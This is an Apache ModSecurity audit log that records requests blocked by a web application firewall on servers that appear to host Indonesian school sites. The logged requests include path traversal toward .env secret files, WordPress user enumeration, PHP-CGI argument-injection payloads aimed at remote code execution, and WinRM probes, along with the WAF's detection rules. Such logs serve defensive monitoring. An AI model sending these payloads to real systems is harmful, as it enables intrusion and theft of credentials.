Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c419279-Z-- --553a1871-A-- [14/Jun/2025:15:54:02 +0700] aE04ql3g_boun6Rx5jIChgAAANg 103.236.140.4 36686 103.236.140.4 8181 --553a1871-B-- GET /volumes/download?file=../../../../../../var/lib/docker/volumes/app_data/_data/config/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 174677408 --553a1871-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --553a1871-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891242161081 824 (- - -) Stopwatch2: 1749891242161081 824; combined=339, p1=293, p2=0, p3=0, p4=0, p5=46, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --553a1871-Z-- --c0f22976-A-- [14/Jun/2025:15:56:03 +0700] aE05I13g_boun6Rx5jIDNgAAAM8 103.236.140.4 39572 103.236.140.4 8181 --c0f22976-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 Accept-Charset: utf-8 --c0f22976-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0f22976-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891363804037 774 (- - -) Stopwatch2: 1749891363804037 774; combined=329, p1=288, p2=0, p3=0, p4=0, p5=41, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0f22976-Z-- --562ee337-A-- [14/Jun/2025:15:59:39 +0700] aE05-2IDXuKmWNi2UBTpeAAAAEE 103.236.140.4 44502 103.236.140.4 8181 --562ee337-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/2.0 (compatible; Ask Jeeves/Teoma) Accept-Charset: utf-8 --562ee337-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --562ee337-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891579526122 677 (- - -) Stopwatch2: 1749891579526122 677; combined=285, p1=245, p2=0, p3=0, p4=0, p5=40, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --562ee337-Z-- --56888b21-A-- [14/Jun/2025:16:00:20 +0700] aE06JF3g_boun6Rx5jIElwAAANE 103.236.140.4 45460 103.236.140.4 8181 --56888b21-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.254.98.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.254.98.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --56888b21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56888b21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891620743379 2747 (- - -) Stopwatch2: 1749891620743379 2747; combined=1449, p1=515, p2=898, p3=0, p4=0, p5=35, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56888b21-Z-- --aa8a4239-A-- [14/Jun/2025:17:04:50 +0700] aE1JQmIDXuKmWNi2UBTw3wAAAEg 103.236.140.4 51596 103.236.140.4 8181 --aa8a4239-B-- GET /.c9/metadata/environment/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; G8141) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --aa8a4239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa8a4239-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749895490087105 925 (- - -) Stopwatch2: 1749895490087105 925; combined=378, p1=336, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa8a4239-Z-- --c2b98d10-A-- [14/Jun/2025:17:08:21 +0700] aE1KFWmwZ6YUkjOdtI4MAwAAAAY 103.236.140.4 51604 103.236.140.4 8181 --c2b98d10-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 66.181.166.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 66.181.166.69 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2b98d10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2b98d10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749895701729703 2990 (- - -) Stopwatch2: 1749895701729703 2990; combined=1281, p1=453, p2=793, p3=0, p4=0, p5=34, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2b98d10-Z-- --1f02744c-A-- [14/Jun/2025:17:43:48 +0700] aE1SZGIDXuKmWNi2UBTw8AAAAFM 103.236.140.4 51730 103.236.140.4 8181 --1f02744c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 162.243.99.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 162.243.99.87 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1f02744c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f02744c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749897828734055 885 (- - -) Stopwatch2: 1749897828734055 885; combined=379, p1=337, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f02744c-Z-- --6c559e07-A-- [14/Jun/2025:20:08:55 +0700] aE10Z2mwZ6YUkjOdtI4MSgAAAA0 103.236.140.4 52342 103.236.140.4 8181 --6c559e07-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.150.168.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.150.168.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6c559e07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c559e07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749906535216943 2748 (- - -) Stopwatch2: 1749906535216943 2748; combined=1226, p1=428, p2=769, p3=0, p4=0, p5=29, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c559e07-Z-- --2af7aa6b-A-- [14/Jun/2025:20:16:56 +0700] aE12SGmwZ6YUkjOdtI4MUQAAAAM 103.236.140.4 52376 103.236.140.4 8181 --2af7aa6b-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --2af7aa6b-C-- --2af7aa6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2af7aa6b-E-- --2af7aa6b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749907016122612 3683 (- - -) Stopwatch2: 1749907016122612 3683; combined=2126, p1=408, p2=1692, p3=0, p4=0, p5=26, sr=57, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2af7aa6b-Z-- --f4c1fb15-A-- [14/Jun/2025:20:43:48 +0700] aE18lGIDXuKmWNi2UBTxPgAAAEo 103.236.140.4 52526 103.236.140.4 8181 --f4c1fb15-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 128.199.89.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 128.199.89.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f4c1fb15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4c1fb15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749908628995617 3395 (- - -) Stopwatch2: 1749908628995617 3395; combined=1479, p1=521, p2=925, p3=0, p4=0, p5=33, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4c1fb15-Z-- --8de2930c-A-- [14/Jun/2025:20:55:12 +0700] aE1_QGmwZ6YUkjOdtI4McgAAAAs 103.236.140.4 52574 103.236.140.4 8181 --8de2930c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.113.153.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.113.153.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8de2930c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8de2930c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749909312029247 3561 (- - -) Stopwatch2: 1749909312029247 3561; combined=1530, p1=491, p2=1002, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8de2930c-Z-- --c2821a54-A-- [14/Jun/2025:21:02:01 +0700] aE2A2V3g_boun6Rx5jILYAAAANE 103.236.140.4 52608 103.236.140.4 8181 --c2821a54-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.10.250.218 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.10.250.218 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --c2821a54-C-- --c2821a54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2821a54-E-- --c2821a54-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749909721877145 4435 (- - -) Stopwatch2: 1749909721877145 4435; combined=2629, p1=562, p2=1991, p3=0, p4=0, p5=76, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2821a54-Z-- --514aa61b-A-- [14/Jun/2025:21:58:45 +0700] aE2OJWIDXuKmWNi2UBTxUgAAAEI 103.236.140.4 52898 103.236.140.4 8181 --514aa61b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.224.173.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.224.173.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --514aa61b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --514aa61b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749913125927107 3564 (- - -) Stopwatch2: 1749913125927107 3564; combined=1532, p1=496, p2=998, p3=0, p4=0, p5=38, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --514aa61b-Z-- --b60b5966-A-- [14/Jun/2025:22:29:54 +0700] aE2VcmmwZ6YUkjOdtI4MqgAAAAE 103.236.140.4 53062 103.236.140.4 8181 --b60b5966-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.46.112.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.46.112.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b60b5966-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b60b5966-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749914994795309 2700 (- - -) Stopwatch2: 1749914994795309 2700; combined=1125, p1=383, p2=709, p3=0, p4=0, p5=32, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b60b5966-Z-- --2962c052-A-- [14/Jun/2025:22:49:55 +0700] aE2aI2mwZ6YUkjOdtI4MsQAAAAs 103.236.140.4 53162 103.236.140.4 8181 --2962c052-B-- POST /wsman HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 101.251.238.174 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 101.251.238.174 X-Forwarded-Proto: http Connection: close Content-Length: 0 Authorization: Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw== Content-Type: application/soap+xml;charset=UTF-8 User-Agent: Microsoft WinRM Client --2962c052-C-- --2962c052-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --2962c052-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749916195841582 4313 (- - -) Stopwatch2: 1749916195841582 4313; combined=2647, p1=577, p2=1974, p3=29, p4=33, p5=33, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2962c052-Z-- --d7306b20-A-- [14/Jun/2025:22:49:59 +0700] aE2aJ0MWfhkd5Y0sFtotEgAAAJM 103.236.140.4 53164 103.236.140.4 8181 --d7306b20-B-- POST /wsman HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 101.251.238.174 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 101.251.238.174 X-Forwarded-Proto: http Connection: close Content-Length: 198 Content-Type: application/soap+xml;charset=UTF-8 User-Agent: Microsoft WinRM Client WSMANIDENTIFY: unauthenticated --d7306b20-C-- --d7306b20-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7306b20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749916199310967 4887 (- - -) Stopwatch2: 1749916199310967 4887; combined=3119, p1=658, p2=2346, p3=37, p4=42, p5=35, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7306b20-Z-- --137ee467-A-- [14/Jun/2025:23:14:44 +0700] aE2f9GmwZ6YUkjOdtI4MwgAAAAw 103.236.140.4 53290 103.236.140.4 8181 --137ee467-B-- GET /.env HTTP/1.0 Referer: https://google.com Host: 103.236.140.4 X-Real-IP: 173.212.223.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.212.223.233 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Upgrade-Insecure-Requests: 1 --137ee467-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --137ee467-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749917684645379 799 (- - -) Stopwatch2: 1749917684645379 799; combined=287, p1=253, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
